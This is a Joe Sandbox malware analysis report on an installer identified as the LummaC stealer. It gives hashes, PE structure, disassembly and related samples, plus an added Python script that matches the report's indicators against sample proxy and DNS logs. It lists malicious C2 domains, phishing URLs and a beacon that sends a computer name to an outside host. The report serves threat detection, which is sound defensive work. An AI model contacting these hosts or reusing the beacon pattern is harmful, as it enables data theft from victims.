                                                                                                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Set-UpFile_v25.exe, 00000000.00000003.1791976489.00000000036BD000.00000004.00000800.00020000.00000000.sdmp, Set-UpFile_v25.exe, 00000000.00000003.1792070865.00000000036BB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://beattalkerz.cyou/apisSet-UpFile_v25.exe, 00000000.00000003.1908617857.0000000003680000.00000004.00000800.00020000.00000000.sdmp, Set-UpFile_v25.exe, 00000000.00000003.1907601851.000000000367F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          unknown
| IP | Domain | Country | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|
| 185.161.251.21 | cegu.shop | United Kingdom | 5089 | NTLGB | false |
| 104.21.25.52 | beattalkerz.cyou | United States | 13335 | CLOUDFLARENETUS | true |
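The URL, IP and domain tables above give the sample's network indicators: the LummaC C2 at beattalkerz.cyou (104.21.25.52, the `/api` endpoints), klipvumisui.shop (`int_clp_sha.txt`, flagged by Avira URL Cloud), the `dfgh.online/invoker.php?compName=` request issued by powershell.exe, which carries a computer name in its query string, and cegu.shop on 185.161.251.21. The Python script below is an added example and not part of the Joe Sandbox report; it turns those indicators into a detection pass over proxy and DNS logs. It normalises hostnames (case, trailing dot, port), matches subdomains but not look-alike names, and pulls the reported computer name out of a dfgh.online beacon. The Squid-style and dnsmasq-style log lines, the client addresses in them and the log field layout are constructed for the example.

```python
"""Match the network indicators from this report against proxy/DNS log lines.

Added example, not Joe Sandbox output. The indicators are copied from the
report's URL, IP and domain tables; the log lines below are constructed.
"""
import ipaddress
import re
from typing import Iterable, Iterator, Optional, Tuple
from urllib.parse import parse_qs, urlsplit

# Indicators taken from the report tables above.
IOC_DOMAINS = {
    "beattalkerz.cyou",   # LummaC C2 (/api endpoints), resolves to 104.21.25.52
    "klipvumisui.shop",   # int_clp_sha.txt, flagged by Avira URL Cloud
    "dfgh.online",        # invoker.php?compName=<hostname>, contacted by powershell.exe
    "cegu.shop",          # 185.161.251.21, seen with other LummaC samples
}
IOC_IPS = {ipaddress.ip_address("185.161.251.21"), ipaddress.ip_address("104.21.25.52")}


def normalize_host(host: str) -> str:
    """Lower-case, drop a :port suffix and a trailing dot, so 'Beattalkerz.CYOU.:443' matches."""
    host = host.strip().lower()
    if host.startswith("["):            # bracketed IPv6 literal, possibly with port
        host = host[1:].split("]")[0]
    elif host.count(":") == 1:          # host:port
        host = host.split(":")[0]
    return host.rstrip(".")


def host_matches(host: str) -> Optional[str]:
    """Return the IOC (domain or IP) a host matches, or None.

    A domain matches itself and any subdomain (x.beattalkerz.cyou) but not a
    look-alike such as notbeattalkerz.cyou.
    """
    h = normalize_host(host)
    try:
        if ipaddress.ip_address(h) in IOC_IPS:
            return h
    except ValueError:
        pass
    for dom in IOC_DOMAINS:
        if h == dom or h.endswith("." + dom):
            return dom
    return None


def beacon_hostname(url: str) -> Optional[str]:
    """Computer name sent to the dfgh.online beacon (compName=..., key matched case-insensitively)."""
    parts = urlsplit(url)
    if host_matches(parts.netloc) != "dfgh.online":
        return None
    qs = {k.lower(): v for k, v in parse_qs(parts.query).items()}
    return qs.get("compname", [None])[0]


# Minimal parsers for two constructed log shapes: Squid access log and dnsmasq query log.
SQUID_RE = re.compile(r"^\S+\s+\d+\s+(?P<src>\S+)\s+\S+\s+\d+\s+(?P<method>\S+)\s+(?P<url>\S+)")
DNS_RE = re.compile(r"query\[\w+\]\s+(?P<qname>\S+)\s+from\s+(?P<src>\S+)")


def scan_lines(lines: Iterable[str]) -> Iterator[Tuple[str, str, str]]:
    """Yield (client, indicator, evidence) for every line that touches an IOC."""
    for line in lines:
        m = SQUID_RE.match(line)
        if m:
            url = m.group("url")
            # CONNECT lines carry host:port, everything else a full URL.
            host = url if m.group("method") == "CONNECT" else urlsplit(url).netloc
            ioc = host_matches(host)
            if ioc:
                yield m.group("src"), ioc, url
            continue
        m = DNS_RE.search(line)
        if m:
            ioc = host_matches(m.group("qname"))
            if ioc:
                yield m.group("src"), ioc, m.group("qname")


# Constructed log lines for the example (not captured from the sandbox run).
SAMPLE_LOGS = [
    "1736257031.112    245 10.0.0.17 TCP_TUNNEL/200 4412 CONNECT beattalkerz.cyou:443 - HIER_DIRECT/104.21.25.52 -",
    "1736257033.905     88 10.0.0.17 TCP_MISS/200 512 GET https://dfgh.online/invoker.php?compName=user-PC - HIER_DIRECT/185.161.251.21 -",
    "1736257034.001     10 10.0.0.22 TCP_MISS/200 1200 GET https://support.mozilla.org/products/firefox - HIER_DIRECT/34.1.2.3 -",
    "Jan  7 08:37:12 dnsmasq[412]: query[A] klipvumisui.shop from 10.0.0.17",
    "Jan  7 08:37:12 dnsmasq[412]: query[A] notbeattalkerz.cyou from 10.0.0.9",
]

if __name__ == "__main__":
    for src, ioc, evidence in scan_lines(SAMPLE_LOGS):
        extra = beacon_hostname(evidence) if ioc == "dfgh.online" else None
        print(f"{src} -> {ioc}: {evidence}" + (f" (reported computer name: {extra})" if extra else ""))
```

Run against the constructed lines, the script reports the CONNECT to beattalkerz.cyou and the DNS query for klipvumisui.shop from 10.0.0.17, and the dfgh.online beacon together with the computer name it carried; the support.mozilla.org request and the look-alike notbeattalkerz.cyou query produce no hit. Replace `SAMPLE_LOGS` with real proxy or resolver output and extend `IOC_DOMAINS` as further samples from the context tables are reviewed.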
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1585343
Start date and time: 2025-01-07 14:36:10 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 28s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 6
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Set-UpFile_v25.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@4/3@4/2
EGA Information:
• Successful, ratio: 50%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 16
• Number of non-executed functions: 102
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.45
• Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 7596 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: Set-UpFile_v25.exe
| Time | Type | Description |
|---|---|---|
| 08:37:11 | API Interceptor | 10x Sleep call for process: Set-UpFile_v25.exe modified |
| 08:37:29 | API Interceptor | 7x Sleep call for process: powershell.exe modified |
| Match | Associated Sample Name / URL | Detection | Threat Name |
|---|---|---|---|
| 185.161.251.21 | installer_1.05_36.8.exe | malicious | LummaC |
| | setup.exe | malicious | LummaC |
| | Setup.exe | malicious | LummaC |
| | installer_1.05_36.7.exe | malicious | LummaC Stealer |
| | Setup.exe | malicious | LummaC |
| | Set-up.exe | malicious | LummaC |
| | setup.exe | malicious | LummaC |
| | 'Set-up.exe | malicious | LummaC |
| | Set-up.exe | malicious | LummaC |
| 104.21.25.52 | https://ness.wiktripfitness.com/ghjki9l-8765t4/3/er4t5y6u7jyhtgrfefrgthyjuyhtgdsarfedwsqa | malicious | Unknown |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| cegu.shop | installer_1.05_36.8.exe | malicious | LummaC | 185.161.251.21 |
| | setup.exe | malicious | LummaC | 185.161.251.21 |
| | Setup.exe | malicious | LummaC | 185.161.251.21 |
| | installer_1.05_36.7.exe | malicious | LummaC Stealer | 185.161.251.21 |
| | Setup.exe | malicious | LummaC | 185.161.251.21 |
| | Set-up.exe | malicious | LummaC | 185.161.251.21 |
| | setup.exe | malicious | LummaC | 185.161.251.21 |
| | 'Set-up.exe | malicious | LummaC | 185.161.251.21 |
| | Set-up.exe | malicious | LummaC | 185.161.251.21 |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
NTLGB | Setup.exe | malicious | LummaC | 185.161.251.21
NTLGB | ppc.elf | malicious | Mirai | 86.15.78.37
NTLGB | installer_1.05_36.8.exe | malicious | LummaC | 185.161.251.21
NTLGB | setup.exe | malicious | LummaC | 185.161.251.21
NTLGB | https://pwv95gp5r-xn--r3h9jdud-xn----c1a2cj-xn----p1ai.translate.goog/sIQKSvTC/b8KvU/uoTt6?ZFhObGNpNXBiblp2YkhabGJXVnVkRUJ6YjNWMGFHVnliblJ5ZFhOMExtaHpZMjVwTG01bGRBPT06c1JsOUE+&_x_tr_sch=http&_x_tr_sl=hrLWHGLm&_x_tr_tl=bTtllyql | malicious | HTMLPhisher | 194.168.231.153
NTLGB | Setup.exe | malicious | LummaC | 185.161.251.21
NTLGB | installer_1.05_36.7.exe | malicious | LummaC Stealer | 185.161.251.21
NTLGB | Setup.exe | malicious | LummaC | 185.161.251.21
NTLGB | Set-up.exe | malicious | LummaC | 185.161.251.21
CLOUDFLARENETUS | Setup.exe | malicious | LummaC | 104.21.80.1
CLOUDFLARENETUS | https://sos-ch-gva-2.exo.io/ready/seah/continue/complete-this-to-continue.html | malicious | CAPTCHA Scam ClickFix | 104.17.25.14
CLOUDFLARENETUS | te13.exe | malicious | Metasploit | 104.21.16.1
CLOUDFLARENETUS | New order 2025.msg | malicious | PureLog Stealer, Snake Keylogger | 188.114.97.3
CLOUDFLARENETUS | https://coggle.it/diagram/Z3zkZPAQxQkDOgmo/t/-/1f6434bfba7d8aab898b2531849681e8b0d7342489acbbff6b172f8658a09526 | malicious | Unknown | 104.17.25.14
CLOUDFLARENETUS | https://email.garagesalefinder.com/c/eJyMU92OsjoUfZp6xwRaoO2FF-XPYT4VnXHQ8caUFivK3wcC-vYnzImc25OQlbXYa-_VJrtyniCCZ-ncwMg2KKWmPrvMCRWYGDSBBAkLnSGigttEUJpiLHRhzLK5JRHWEbE0wS1LkxzqmpnKRCMYcymIhUyJgKkr3nCVtjxPz1kp0-ZNVMUsn1_u9xogBmAAYDAMw5uqKpWnXLZp02cibUcfgEHNVcolgAEX-Q2goOUAeUsAbZ4B5Lma-bXS9YjEH8_jUsCMDFHdh-8V6xawX6ug4FFt3FtnCCFin8wJow2-DWulyU1_iVhfsfe8SpYtI8px_iiPHZXv8Movh2Cj-95Hcj0kV7urV6jyYvatjOfWaYZ2MRxIba6V3Jx55O3PcZmp2muai3lerzYyDgu0zWKnNlb-o7Sf7h6p70NxCvM23_41HfOEGuWGy9q9Hnlqfep7pO0Kfgrvm-rvV7zTOloie11_fJdEol2uDrr9xfmOPrr1Vr-IJWM_mXjnt9SPV5IVx53pOD-UrUI1qHwX-N2-JfHP9ThUm97B9z_nIOnjcuOGjloo51Iwxy6FckMA7bIrAPIMAG2RSYA8a5H18gTbKy737aLto4f-0GD3DaDdZgogj0WebZ6M8IN8ys_TY2eziPTBe70KjWKtt8gaxll5lpZ3gDzBtbpLNBsalBgGNrFuUoTHOC67JgfIGzehnVYBQAtjAC37l8GRuSOYU4G-pG2NgEYgk_ReFjwWsPli0J_MwSSdVxuc_v2bYU25I0BvMvvT0fBL_tdrsyktMAglv0Qs4o5D0vHD8ZIUFG4XwVMUFP0UQcef1jWBOkDea447drMR_PHuZATmTlIH0KIMQPP3-3_uWTOv0_JWvWU9L6semDpvmmpIeHn7fYv9HP4TAAD__7e2IkM | malicious | HTMLPhisher | 104.17.25.14
CLOUDFLARENETUS | https://check.qlkwr.com/awjsx.captcha?u=d9b43caa-60bc-4673-bed6-4e9abc0c0678 | malicious | Unknown | 104.21.55.46
CLOUDFLARENETUS | file.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc | 188.114.96.3
CLOUDFLARENETUS | Crawl.exe | malicious | Unknown | 1.1.1.1
CLOUDFLARENETUS | ENQ-0092025.doc | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger | 188.114.97.3
Match | Associated Sample Name / URL | Detection | Threat Name | Context
a0e9f5d64349fb13191bc781f81f42e1 | Setup.exe | malicious | LummaC | 185.161.251.21, 104.21.25.52
a0e9f5d64349fb13191bc781f81f42e1 | LVkAi4PBv6.exe | malicious | Unknown | 185.161.251.21, 104.21.25.52
a0e9f5d64349fb13191bc781f81f42e1 | 64pOGv7k4N.exe | malicious | LummaC | 185.161.251.21, 104.21.25.52
a0e9f5d64349fb13191bc781f81f42e1 | BnJxmraqlk.exe | malicious | LummaC, PrivateLoader | 185.161.251.21, 104.21.25.52
a0e9f5d64349fb13191bc781f81f42e1 | NjFiIQNSid.exe | malicious | LummaC | 185.161.251.21, 104.21.25.52
a0e9f5d64349fb13191bc781f81f42e1 | H565rymIuO.doc | malicious | Unknown | 185.161.251.21, 104.21.25.52
a0e9f5d64349fb13191bc781f81f42e1 | w3245.exe | malicious | Unknown | 185.161.251.21, 104.21.25.52
a0e9f5d64349fb13191bc781f81f42e1 | w3245.exe | malicious | Unknown | 185.161.251.21, 104.21.25.52
a0e9f5d64349fb13191bc781f81f42e1 | sEG2xXpg0X.xlsm | malicious | Unknown | 185.161.251.21, 104.21.25.52
a0e9f5d64349fb13191bc781f81f42e1 | Drivespan.dll | malicious | Unknown | 185.161.251.21, 104.21.25.52
No context

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 64
Entropy (8bit): 1.1510207563435464
Encrypted: false
SSDEEP: 3:NlllulPki/llllZ:NllUcylll
MD5: D8D47FD6FA3E199E4AFF68B91F1D04A8
SHA1: 788625E414B030E5174C5BE7262A4C93502C2C21
SHA-256: 2D9AF9AB25D04D1CF9B25DB196A988CD6E4124C1B8E185B96F2AB9554F4A6738
SHA-512: 5BFD83D07DC3CB53563F215BE1D4D7206340A4C0AB06988697637C402793146D13CDDE0E27DC8301E4506553D957876AC9D7A7BF3C7431BBDD5F019C17AB0A58
Malicious: false
Reputation: moderate, very likely benign file
Preview: @...e.................................^..............@..........

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Reputation: high, very likely benign file
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Reputation: high, very likely benign file
Preview: # PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                              Entropy (8bit):0.5144643785072911
                                                                                                                                                              TrID:
                                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 97.75%
                                                                                                                                                              • Windows ActiveX control (116523/4) 1.14%
                                                                                                                                                              • Inno Setup installer (109748/4) 1.07%
                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                              File name:Set-UpFile_v25.exe
                                                                                                                                                              File size:75'060'322 bytes
                                                                                                                                                              MD5:2f33775c502e7b2d60b9bfe944b46863
                                                                                                                                                              SHA1:57d023419ecbe81d27368757fea4366de68891ea
                                                                                                                                                              SHA256:fce2d6446420934b428053edf66b7cc5838717fbf67911c11145424ebd0a045b
                                                                                                                                                              SHA512:afd577d935d151cff6eae652be7f362bc29e89df5a2166bf9cf56f6acbbc57626abe3a970b765b4bb1e079e5bf8a41e4cb440f2a23913d43ca5631c5cfb54acf
                                                                                                                                                              SSDEEP:24576:otdAm9DUi/CR3wCkCiRgoG7hBaHkbEXaeG/jFt5xTx9CAaui1CgqU8Expi0Sy4YF:YqTytRFkDek1XFaumfq16E0nZpd
                                                                                                                                                              TLSH:1DF7C1297600A1A1B7D2BFFD490393CA9AA6E108B33134FF155E270ADD3B5D8433765A
                                                                                                                                                              File Content Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                                                                                                              Icon Hash:2d2e3797b32b2b99
                                                                                                                                                              Entrypoint:0x50156c
                                                                                                                                                              Entrypoint Section:.itext
                                                                                                                                                              Digitally signed:true
                                                                                                                                                              Imagebase:0x400000
Subsystem: windows gui
Image File Characteristics: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
DLL Characteristics: NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp: 0x57051F89 [Wed Apr 6 14:39:05 2016 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 0
File Version Major: 5
File Version Minor: 0
Subsystem Version Major: 5
Subsystem Version Minor: 0
Import Hash: f62b90e31eca404f228fcf7068b00f31
Signature Valid: false
Signature Issuer: CN=VeriSign Class 3 Code Signing 2010 CA, OU=Terms of use at https://www.verisign.com/rpa (c)10, OU=VeriSign Trust Network, O="VeriSign, Inc.", C=US
Signature Validation Error: The digital signature of the object did not verify
Error Number: -2146869232 (HRESULT 0x80096010, TRUST_E_BAD_DIGEST: the certificate chain parses, but the Authenticode hash embedded in the signature does not match the file's bytes, so the signature was made over a different file or the file was modified after signing; the NVIDIA subject below says nothing about this sample's origin)
Not Before, Not After
• 27/07/2015 20:00:00 to 26/07/2018 19:59:59 (expired at analysis time)
Subject Chain
• CN=NVIDIA Corporation, O=NVIDIA Corporation, L=SANTA CLARA, S=California, C=US
Version: 3
Thumbprint MD5: F7219078FBE20BC1B98BF8A86BFC0396
Thumbprint SHA-1: 30632EA310114105969D0BDA28FDCE267104754F
Thumbprint SHA-256: 1B5061CF61C93822BDE2433156EEBE1F027C8FA9C88A4AF0EBD1348AF79C61E2
Serial: 14781BC862E8DC503A559346F5DCC518
Instruction
push ebp
mov ebp, esp
add esp, FFFFFFF0h
push ebx
push esi
push edi
mov eax, 004FEBF4h
call 00007F218C420B12h
push FFFFFFECh
mov eax, dword ptr [00504E38h]
mov eax, dword ptr [eax]
mov ebx, dword ptr [eax+00000170h]
push ebx
call 00007F218C4219BDh
and eax, FFFFFF7Fh
push eax
push FFFFFFECh
mov eax, dword ptr [00504E38h]
push ebx
call 00007F218C421C12h
xor eax, eax
push ebp
push 005015E7h
push dword ptr fs:[eax]
mov dword ptr fs:[eax], esp
push 00000001h
call 00007F218C42135Dh
call 00007F218C5164BCh
mov eax, dword ptr [004FE82Ch]
push eax
push 004FE890h
mov eax, dword ptr [00504E38h]
mov eax, dword ptr [eax]
call 00007F218C493F51h
call 00007F218C516510h
xor eax, eax
pop edx
pop ecx
pop ecx
mov dword ptr fs:[eax], edx
jmp 00007F218C51915Bh
jmp 00007F218C41C239h
call 00007F218C51628Ch
mov eax, 00000001h
call 00007F218C41CCFAh
call 00007F218C41C67Dh
mov eax, dword ptr [00504E38h]
mov eax, dword ptr [eax]
mov edx, 0050177Ch
call 00007F218C493A5Ch
push 00000005h
mov eax, dword ptr [00504E38h]
mov eax, dword ptr [eax]
mov eax, dword ptr [eax+00000170h]
push eax
call 00007F218C421BD3h
mov eax, dword ptr [00504E38h]
mov eax, dword ptr [eax]
mov edx, dword ptr [004D9740h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x10d000 | 0x3840 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x113000 | 0x6d600 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x4791aa2 (raw file offset, not an RVA) | 0x39c0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x112000 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x10da80 | 0x88c | .idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0xfe084 | 0xfe200 | ef1b62ba5d0b70ba5c2cfd64e2c11839 | False | 0.4838360412567634 | data | 6.484873057389425 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext | 0x100000 | 0x1788 | 0x1800 | 030d751d7e20e11f863bdb27a950c708 | False | 0.5203450520833334 | data | 5.94899155660316 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0x102000 | 0x3068 | 0x3200 | 2f90c6f68c18651f5b580d5ad2b852e9 | False | 0.421796875 | data | 4.334644118113417 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss | 0x106000 | 0x6194 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x10d000 | 0x3840 | 0x3a00 | e31e730fc86b9dac8932bd3f92752751 | False | 0.31041217672413796 | data | 5.202469592139362 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0x111000 | 0x3c | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0x112000 | 0x18 | 0x200 | d6264f4705ad03600aa29f24c89eb799 | False | 0.05078125 | MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "Q" (libmagic misidentification of a 24-byte TLS directory) | 0.20544562813451883 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x113000 | 0x6d600 | 0x6d600 | 1b67589f903edb38a6f0dd56d6b97683 | False | 0.5853459821428572 | data | 7.319003457622621 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_CURSOR | 0x113c44 | 0x134 | Targa image data - Map 64 x 65536 x 1 +32 "\001" | English | United States | 0.38636363636363635
RT_CURSOR | 0x113d78 | 0x134 | data | English | United States | 0.4642857142857143
RT_CURSOR | 0x113eac | 0x134 | data | English | United States | 0.4805194805194805
RT_CURSOR | 0x113fe0 | 0x134 | data | English | United States | 0.38311688311688313
RT_CURSOR | 0x114114 | 0x134 | data | English | United States | 0.36038961038961037
RT_CURSOR | 0x114248 | 0x134 | data | English | United States | 0.4090909090909091
RT_CURSOR | 0x11437c | 0x134 | Targa image data - RGB 64 x 65536 x 1 +32 "\001" | English | United States | 0.4967532467532468
RT_BITMAP | 0x1144b0 | 0x4e8 | Device independent bitmap graphic, 48 x 48 x 4, image size 1152 | | | 0.2945859872611465
RT_BITMAP | 0x114998 | 0xe8 | Device independent bitmap graphic, 16 x 16 x 4, image size 128 | | | 0.521551724137931
RT_ICON | 0x114a80 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | United States | 0.5675675675675675
RT_ICON | 0x114ba8 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 320 | English | United States | 0.4486994219653179
RT_ICON | 0x115110 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 640 | English | United States | 0.4637096774193548
RT_ICON | 0x1153f8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1152 | English | United States | 0.3935018050541516
RT_STRING | 0x115ca0 | 0xec | data | | | 0.6059322033898306
RT_STRING | 0x115d8c | 0x250 | data | | | 0.47466216216216217
RT_STRING | 0x115fdc | 0x28c | data | | | 0.4647239263803681
RT_STRING | 0x116268 | 0x3e4 | data | | | 0.4347389558232932
RT_STRING | 0x11664c | 0x9c | data | | | 0.717948717948718
RT_STRING | 0x1166e8 | 0xe8 | data | | | 0.6293103448275862
RT_STRING | 0x1167d0 | 0x468 | data | | | 0.3820921985815603
RT_STRING | 0x116c38 | 0x38c | data | | | 0.3898678414096916
RT_STRING | 0x116fc4 | 0x3dc | data | | | 0.39271255060728744
RT_STRING | 0x1173a0 | 0x360 | data | | | 0.37037037037037035
RT_STRING | 0x117700 | 0x40c | data | | | 0.3783783783783784
RT_STRING | 0x117b0c | 0x108 | data | | | 0.5113636363636364
RT_STRING | 0x117c14 | 0xcc | data | | | 0.6029411764705882
RT_STRING | 0x117ce0 | 0x234 | data | | | 0.5070921985815603
RT_STRING | 0x117f14 | 0x3c8 | data | | | 0.3181818181818182
RT_STRING | 0x1182dc | 0x32c | data | | | 0.43349753694581283
RT_STRING | 0x118608 | 0x2a0 | data | | | 0.41964285714285715
RT_RCDATA | 0x1188a8 | 0x82e8 | data | English | United States | 0.11261637622344235
RT_RCDATA | 0x120b90 | 0x10 | data | | | 1.5
RT_RCDATA | 0x120ba0 | 0x1800 | PE32+ executable (console) x86-64, for MS Windows | English | United States | 0.3924153645833333
RT_RCDATA | 0x1223a0 | 0x6b0 | data | | | 0.6466121495327103
RT_RCDATA | 0x122a50 | 0x5b10 | PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows | English | United States | 0.3255404941660947
RT_RCDATA | 0x128560 | 0x125 | Delphi compiled form 'TMainForm' | | | 0.7508532423208191
RT_RCDATA | 0x128688 | 0x3a2 | Delphi compiled form 'TNewDiskForm' | | | 0.524731182795699
RT_RCDATA | 0x128a2c | 0x320 | Delphi compiled form 'TSelectFolderForm' | | | 0.53625
RT_RCDATA | 0x128d4c | 0x300 | Delphi compiled form 'TSelectLanguageForm' | | | 0.5703125
RT_RCDATA | 0x12904c | 0x5d9 | Delphi compiled form 'TUninstallProgressForm' | | | 0.4562458249832999
RT_RCDATA | 0x129628 | 0x461 | Delphi compiled form 'TUninstSharedFileForm' | | | 0.4335414808206958
RT_RCDATA | 0x129a8c | 0x2092 | Delphi compiled form 'TWizardForm' | | | 0.2299112497001679
RT_GROUP_CURSOR | 0x12bb20 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.25
RT_GROUP_CURSOR | 0x12bb34 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.25
RT_GROUP_CURSOR | 0x12bb48 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x12bb5c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x12bb70 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x12bb84 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x12bb98 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_ICON | 0x12bbac | 0x3e | data | English | United States | 0.8387096774193549
RT_VERSION | 0x12bbec | 0x15c | data | English | United States | 0.5689655172413793
RT_MANIFEST | 0x12bd48 | 0x62c | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.4240506329113924
